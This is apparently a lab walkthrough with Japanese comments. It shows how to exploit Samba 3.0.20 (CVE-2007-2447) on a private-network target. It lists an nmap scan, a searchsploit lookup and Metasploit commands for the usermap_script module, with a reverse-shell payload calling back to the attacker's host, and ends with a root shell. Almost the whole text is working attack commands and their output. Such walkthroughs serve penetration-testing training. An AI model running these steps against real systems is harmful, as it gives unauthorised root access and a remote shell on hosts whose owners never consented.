
nmap -sS -sV -p 139,445 192.168.56.102
期待される結果:
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open microsoft-ds Samba smbd 3.0.20-Debian
👉 Samba バージョン: 3.0.20 これは CVE-2007-2447 に対して脆弱です。
searchsploit samba 3.0.20
結果:
Samba 3.0.20 - 'Username' map script Command Execution
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101
ペイロードは自動的に設定されます:
cmd/unix/reverse
確認:
show options
run
または
exploit
成功した場合:
Command shell session opened
確認します:
whoami
👉 結果:
root